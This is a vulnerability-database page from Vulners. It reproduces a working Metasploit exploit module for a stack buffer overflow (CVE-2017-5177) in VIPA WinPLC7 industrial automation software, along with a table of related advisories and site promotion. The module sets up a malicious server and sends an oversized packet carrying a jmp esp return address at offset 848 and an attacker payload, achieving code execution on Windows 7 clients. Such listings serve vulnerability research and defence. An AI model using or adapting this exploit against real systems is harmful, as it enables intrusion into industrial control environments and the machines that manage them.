Vulners
Lucene search
Viap Automation WinPLC7 5.0.45.5921 - Recv Buffer Overflow Exploit
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | VIPA Automation WinPLC7 5.0.45.5921 Buffer Overflow Exploit | 15 Sep 201700:00 | – | zdt |
 | WinPLC Stack Buffer Overflow Vulnerability | 28 Feb 201700:00 | – | cnvd |
 | VIPA Controls WinPLC7 recv Stack-based Buffer Overflow (CVE-2017-5177) | 23 Apr 201700:00 | – | checkpoint_advisories |
 | CVE-2017-5177 | 19 May 201702:43 | – | cve |
 | CVE-2017-5177 | 19 May 201702:43 | – | cvelist |
 | Viap Automation WinPLC7 5.0.45.5921 - Recv Buffer Overflow (Metasploit) | 13 Sep 201700:00 | – | exploitdb |
 | Viap Automation WinPLC7 5.0.45.5921 - Recv Buffer Overflow (Metasploit) | 13 Sep 201700:00 | – | exploitpack |
 | VIPA Controls WinPLC7 | 23 Feb 201700:00 | – | ics |
 | CVE-2017-5177 | 19 May 201703:29 | – | nvd |
 | CVE-2017-5177 | 19 May 201703:29 | – | osv |
10
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::TcpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'VIPA Authomation WinPLC7 recv Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow found in VIPA
Automation WinPLC7 <= 5.0.45.5921. The overflow is triggered when
WinPLC7 connects to a remote server and accepts a malicious packet.
The first 2 bytes of this packet are read in and used as the size
value for a later recv function. If a size value of sufficiently
large size is supplied a stack buffer overflow will occur
},
'Author' => [ 'james fitts' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'ZDI', '17-112' ],
[ 'CVE', '2017-5177' ],
[ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-17-054-01' ]
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "",
'StackAdjustment' => -3500
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows 7 EN',
{
# ws7v5.exe
# jmp esp
'Ret' => 0x00422354
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 28 2017'))
register_options(
[
OptPort.new('SRVPORT', [ true, "The port to listen on", 7777])
], self.class)
end
def on_client_data(client)
p = payload.encoded
pkt = "\x13\x88\x00\x00\x00" # len
pkt += Rex::Text.pattern_create(5000)
pkt[848, 4] = [target.ret].pack('V')
pkt[852, p.length] = p
client.put(pkt)
handler
service.close_client(client)
end
end
# 0day.today [2018-01-10] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Sep 2017 00:00Current
7.5High risk
Vulners AI Score7.5
EPSS0.45114